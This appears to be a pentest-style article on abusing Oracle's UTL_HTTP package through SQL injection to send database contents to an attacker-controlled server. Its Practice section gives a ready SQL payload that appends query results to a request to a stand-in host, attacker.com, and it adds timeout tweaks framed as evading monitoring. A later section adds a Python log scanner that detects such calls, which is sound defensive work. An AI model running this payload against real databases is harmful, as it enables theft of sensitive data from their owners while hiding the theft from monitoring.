UTL_HTTP
Context
This article will guide you through exploiting the Oracle database's UTL_HTTP package for out-of-band data exfiltration via SQL injection. The objective is to understand how this package can be leveraged to send sensitive information from a compromised database to an attacker-controlled server using HTTP requests. It is assumed that you already know the HTTP protocol, Oracle database architecture, and Oracle SQL injection techniques.
Theory
UTL_HTTP Package in Oracle
The UTL_HTTP package in Oracle is a PL/SQL package designed to make HTTP requests from within the Oracle database. It allows the database to interact with web services over HTTP, for example to retrieve content from web resources or to call RESTful APIs. However, this functionality also introduces a potential vulnerability. If a SQL injection point exists, an attacker can use UTL_HTTP to exfiltrate data by sending it over HTTP to an external server that they control.
HTTP Exfiltration via UTL_HTTP
The primary attack vector using UTL_HTTP involves crafting a SQL injection payload that makes an HTTP request to an attacker-controlled URL, appending sensitive data as query parameters. This mechanism allows a steady flow of data from the database directly to the attacker's server. The method is effective because it uses a legitimate database feature to move the data out.
UTL_HTTP.REQUEST Function
The UTL_HTTP.REQUEST function sends an HTTP request to a specified URL and returns the response. In the context of exploitation, this function can be manipulated to append sensitive data from the database to the HTTP request sent to an external server. This exploitation takes advantage of the function's intended behavior for malicious purposes.
UTL_HTTP.set_transfer_timeout
The UTL_HTTP.set_transfer_timeout procedure defines the timeout duration for HTTP requests made by the UTL_HTTP package. By adjusting this setting, an attacker can optimize the operation to avoid detection or to ensure that the exfiltration process completes swiftly. An improperly set timeout can also lead to denial of service or provide cover against security monitoring.
Practice
Exfiltrate data using UTL_HTTP.REQUEST
- Initiate the SQL injection payload to send sensitive data to an attacker-controlled server by executing:
SELECT UTL_HTTP.REQUEST('http://attacker.com/exfil?data='||(SELECT sensitive_data FROM sensitive_table)) FROM dual;
This statement appends the result of the query for sensitive data to an HTTP request directed to the attacker’s server.
- To keep the operation from being held up, set a short timeout:
EXEC UTL_HTTP.set_transfer_timeout(5);
This step reduces the likelihood of detection by limiting the time the database spends on HTTP operations.
The outcome of these steps should be the successful exfiltration of sensitive data from the database to your specified server over HTTP.
Configure UTL_HTTP for stealthy exfiltration
- Adjust the timeout settings for better performance and stealth:
EXEC UTL_HTTP.set_transfer_timeout(10);
By tweaking the timeout, you can maintain a balance between the stealthiness of your operation and its reliability.
- Execute the refined exfiltration command:
SELECT UTL_HTTP.REQUEST('http://attacker.com/exfil?data='||(SELECT sensitive_data FROM sensitive_table)) FROM dual;
This ensures significant pieces of data are steadily sent out without immediate detection by monitoring systems.
Through these steps, you can achieve a more discreet and efficient data exfiltration process.
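For defenders, the payload shape shown above is recognizable in request logs and audit trails. The following is an added example, not part of the original article: a Python scanner that flags UTL_HTTP.REQUEST calls in log lines, reports the destination host, and notes whether query data is concatenated onto the URL. The sample lines, the allow-list and the host rates.internal.example are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# UTL_HTTP.REQUEST('<url literal>' [|| ...]), tolerant of case and whitespace.
CALL_RE = re.compile(
    r"utl_http\s*\.\s*request\s*\(\s*'([^']*)'\s*(\|\|)?", re.IGNORECASE)

def decode(text, rounds=3):
    """URL-decode repeatedly so encoded request parameters are inspected too."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_line(line, allowed_hosts=frozenset()):
    """Return one finding per UTL_HTTP.REQUEST call found in a log line."""
    findings = []
    for match in CALL_RE.finditer(decode(line)):
        host = (urlsplit(match.group(1)).hostname or "").lower()
        findings.append({
            "host": host,
            # A URL literal followed by || means query data is appended to it.
            "appends_data": match.group(2) is not None,
            "allowed": host in allowed_hosts,
        })
    return findings

def scan_log(lines, allowed_hosts=frozenset()):
    """Map 1-based line number to findings that call a non-allowed host."""
    alerts = {}
    for number, line in enumerate(lines, 1):
        hits = [f for f in scan_line(line, allowed_hosts) if not f["allowed"]]
        if hits:
            alerts[number] = hits
    return alerts

# Constructed sample lines (web access log and audit-trail SQL text).
SAMPLE_LOG = [
    '10.0.0.7 "GET /item?id=42 HTTP/1.1" 200',
    '10.0.0.9 "GET /item?id=SELECT%20UTL_HTTP.REQUEST(%27http://attacker.com/'
    'exfil?data=%27%7C%7C(SELECT%20sensitive_data%20FROM%20sensitive_table))'
    '%20FROM%20dual HTTP/1.1" 500',
    "AUDIT app_user: SELECT utl_http.request('http://rates.internal.example/fx')"
    " FROM dual",
]
ALLOWED = frozenset({"rates.internal.example"})  # hypothetical allow-list

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG, ALLOWED).items():
        print(number, hits)
```

On Oracle 11g and later, UTL_HTTP calls to hosts without a network ACL entry fail with ORA-24247, so a hit for a blocked host is still worth triaging as evidence of an injectable parameter.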
Tools
- Oracle SQL*Plus
- Wireshark